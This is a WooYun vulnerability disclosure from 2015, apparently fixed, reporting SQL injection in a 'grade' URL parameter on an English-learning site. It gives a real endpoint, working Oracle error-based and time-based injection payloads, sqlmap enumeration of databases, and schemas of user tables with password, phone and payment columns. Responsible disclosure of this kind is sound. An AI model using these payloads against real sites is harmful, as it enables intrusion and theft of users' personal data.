当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157774

漏洞标题:笔头网SQL注入漏洞(涉及近40w用户)

相关厂商:e21.cn

漏洞作者: 路人甲

提交时间:2015-12-03 12:13

修复时间:2016-01-04 10:39

公开时间:2016-01-04 10:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

http://denglish.e21.cn/diag/user_myclazz.do;jsessionid=D34619F852B1EF15E0EB4890AA68A335?pageNum=1&pageRows=5&grade=0&bjtype=common
grade参数存在注入

Parameter: grade (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: pageNum=1&pageRows=5&grade=0') AND 8844=CTXSYS.DRITHSX.SN(8844,(CHR(113)||CHR(107)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))) AND ('ibJw'='ibJw&bjtype=common
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: pageNum=1&pageRows=5&grade=0') AND 2118=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('eRHT'='eRHT&bjtype=common
---
web application technology: JSP
back-end DBMS: Oracle
available databases [25]:
[*] APEX_030200
[*] APPQOSSYS
[*] BITOU
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DENGLISH
[*] DENGLISH3
[*] EBOOK
[*] EBOOK1
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDSYS
[*] NEW007
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

漏洞证明:

back-end DBMS: Oracle
Database: NEW007
+--------+---------+
| Table | Entries |
+--------+---------+
| T_USER | 126975 |
+--------+---------+
Database: NEW007
Table: T_USER
[32 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| ADDRESS | VARCHAR2 |
| AMOUNT | NUMBER |
| CARD_POINT | NUMBER |
| CREDIT | NUMBER |
| CRT_DATE | DATE |
| CURRENT_HOST | VARCHAR2 |
| EMAIL | VARCHAR2 |
| GENDER | VARCHAR2 |
| GRADE | VARCHAR2 |
| GRADE_ID | NUMBER |
| IMAGE | VARCHAR2 |
| INTRODUCE | VARCHAR2 |
| LAST_TIME | DATE |
| LOGIN_COUT | NUMBER |
| LOGIN_NAME | VARCHAR2 |
| MSN | VARCHAR2 |
| NOTE | VARCHAR2 |
| PASSWD | VARCHAR2 |
| PHONE | VARCHAR2 |
| PHONE_CHECK | VARCHAR2 |
| PRIVILEGE | VARCHAR2 |
| QQ | VARCHAR2 |
| QQ_OPENID | VARCHAR2 |
| REGION_ID | NUMBER |
| ROLE_ID | NUMBER |
| RRUID | VARCHAR2 |
| SCHOOL_NAME | VARCHAR2 |
| SINA_UID | VARCHAR2 |
| STATUS | VARCHAR2 |
| USER_ID | NUMBER |
| USER_NAME | VARCHAR2 |
| USER_TYPE | VARCHAR2 |
+--------------+----------+

b1.png


http://www.penglish.cn/ 笔头网--英语只能学习平台共256217个会员

back-end DBMS: Oracle
Database: BITOU
+--------+---------+
| Table | Entries |
+--------+---------+
| T_USER | 256217 |
+--------+---------+
Database: BITOU
Table: T_USER
[51 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ADDRESS | VARCHAR2 |
| ALIPAY | VARCHAR2 |
| AMOUNT | NUMBER |
| BIRTHDAY | VARCHAR2 |
| BLOG_URL | VARCHAR2 |
| CARD_POINT | NUMBER |
| CET_TYPE | NUMBER |
| CHANNEL_ID | NUMBER |
| CREDIT | NUMBER |
| CRT_DATE | DATE |
| CRT_OP | VARCHAR2 |
| CURRENT_DEV | VARCHAR2 |
| CURRENT_HOST | VARCHAR2 |
| DS_PRODUCT_ID | NUMBER |
| EMAIL | VARCHAR2 |
| EXP | NUMBER |
| GENDER | VARCHAR2 |
| GRADE | VARCHAR2 |
| GRADE_ID | NUMBER |
| ID_VALIDATION | VARCHAR2 |
| IMAGE | VARCHAR2 |
| INTRODUCE | VARCHAR2 |
| KY_USE_DAYS | NUMBER |
| LAST_TIME | DATE |
| LOGIN_COUT | NUMBER |
| LOGIN_NAME | VARCHAR2 |
| MSN | VARCHAR2 |
| NAME | VARCHAR2 |
| NOTE | VARCHAR2 |
| ORG_ID | NUMBER |
| PARENT_PASSWORD | VARCHAR2 |
| PASSWD | VARCHAR2 |
| PHONE | VARCHAR2 |
| PRIVILEGE | VARCHAR2 |
| PROMOTE_ID | NUMBER |
| PROMOTER_LINK | VARCHAR2 |
| QQ | VARCHAR2 |
| REG_FROM | NUMBER |
| REG_HOST | VARCHAR2 |
| REGION_ID | NUMBER |
| SCHOOL | VARCHAR2 |
| STATUS | VARCHAR2 |
| THIRD_TYPE | VARCHAR2 |
| THIRD_UID | VARCHAR2 |
| USE_DAYS | NUMBER |
| USE_TIME | DATE |
| USER_ID | NUMBER |
| USER_NAME | VARCHAR2 |
| USER_TYPE | VARCHAR2 |
| VALID_DAYS | NUMBER |
| WX_ID | VARCHAR2 |
+-----------------+----------

b4.png


b3.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-04 13:30

厂商回复:

本次SQL注入共计可直接影响系统的稳定性,并泄露部分数据

最新状态:

2015-12-04:这个漏洞发生在我们(e21.cn)合作企业运营的系统上。与我们(e21.cn)无直接关系。我们已通知了相关企业,他们已经处理了相关漏洞。不过,由于营运需要,将在晚一些时间后,再选择公开漏洞。由于单位体制原因,无法送出物质礼物深感抱歉。在这里非常感谢提供漏洞的白帽子!!

2016-01-04:根据合作方的要求,决定今天公开此漏洞!谢谢白帽子!